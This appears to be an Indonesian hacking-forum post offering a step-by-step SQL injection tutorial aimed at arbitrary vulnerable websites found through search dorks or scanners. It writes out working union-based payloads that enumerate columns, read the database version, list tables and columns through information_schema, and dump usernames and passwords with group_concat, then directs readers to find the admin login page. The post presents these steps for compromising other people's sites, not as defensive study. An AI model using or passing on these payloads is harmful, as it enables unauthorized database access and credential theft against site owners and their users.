kita harus berbagi tutorial
agar hacker indonesia bsa menang ini
tutro yang gw tau dari wild strato
Tutorial Text ?? click next
1. silahkan anda cari sendiri website yang bisa dibug melalui google/bing ataupun SQLi Scanner..
kalau aku sih pake SQLi Scanner di
[You must be registered and logged in to see this link.] ama
[You must be registered and logged in to see this link.]. pilih aja dork listnya:
untuk list dork di wild-hack.blogspot.com
3. untuk yang pakai manual cek di google/bing:
contoh:
[You must be registered and logged in to see this link.] <- You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near ''' at line 1
Nb: berarti Webnya bisa di hack. Dan untuk yang pakai scanner. udah disediain web yang bisa dihack
4. lalu coba anda tambahkan kata: order by 1-- sampai menuju titik error
example:
[You must be registered and logged in to see this link.] order by 1-- <-- no error
[You must be registered and logged in to see this link.] order by 2-- <-- no error
[You must be registered and logged in to see this link.] order by 3-- <-- no error
[You must be registered and logged in to see this link.] order by 4-- <-- ERROR..!
5. nah yang kita ambil adalah bagian 3-nya (yang error ndak usah)
sekarang coba hapuskan order by 4-- , lalu diganti dengan :
[You must be registered and logged in to see this link.] union all select 1,2,3--
(pada bagian warna merah (samping id) dikasih - dan pada setelah angka
id, dikasih union all select 1,2,3-- <<-- dimana pada order by
tidak terjadi error)
6. nah pasti keluar angka dibagian wesitenya, contoh saya ambil angka 2. lalu coba angka 2 diganti menjadi @@version:
ex:
[You must be registered and logged in to see this link.] union all select 1,@@version,3--
7. jika keluar angka versi 5.0.1 comunity log (atau yang lain << yang penting versi 5) berarti lanjutkan
kalau keluar versi 4 tinggalkan saja dan cari web lain..!!
8. nah coba @@version diganti jadi group_concat(table_name) dan
disamping union all select 1,2,3 ditambahkan from
information_schema.tables where table_schema=database()
Contoh:
[You must be registered and logged in to see this link.] union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--
9. nah disitu keluar beberapa table yang mungkin ada table berisi users
ataupun admin. contoh keluar table bernama users, lalu hex kata "users"
1. buka link:
[You must be registered and logged in to see this link.]...s/texttohex.php
2. dibagian string masukan text yang ingin di hex
3. click convert
4. copy hex: jika sudah maka bagian group_concat(table_name) dan from information_schema.tables where table_schema=database()
diubah menjadi:
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() = table_name=0x(tambahkan / paste kata yang di hex tadi) = table_name=0x7573657273
Contoh:
[You must be registered and logged in to see this link.] union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--
10. nah setelah itu akan ad beberapa colum tentang username, password, email, etc.
lalu dibagian group_concat(column_name) . dibagian merah ubah dengan diisikan column username dan password.
contoh:
group_concat(username,0x3a,password) <- setiap ingin menambahkan
column, tambahkan koma (,) dan 0x3a lalu ubah:
information_schema.columns where table_name=0x7573657273-- dengan nama
table yang barusan di hex (contoh yang ini users) maka from users--
example :
[You must be registered and logged in to see this link.] union all select 1,group_concat(username,0x3a,password)3 from users--
11. lalu akan keluar username dan password yang kemungkinan ad username admin dengan password admin
12. silahkan cari sendiri halaman login admin..
13 Enjoy~~
kalo ada yang punya berbagi karna
dari berbagi dapat sukses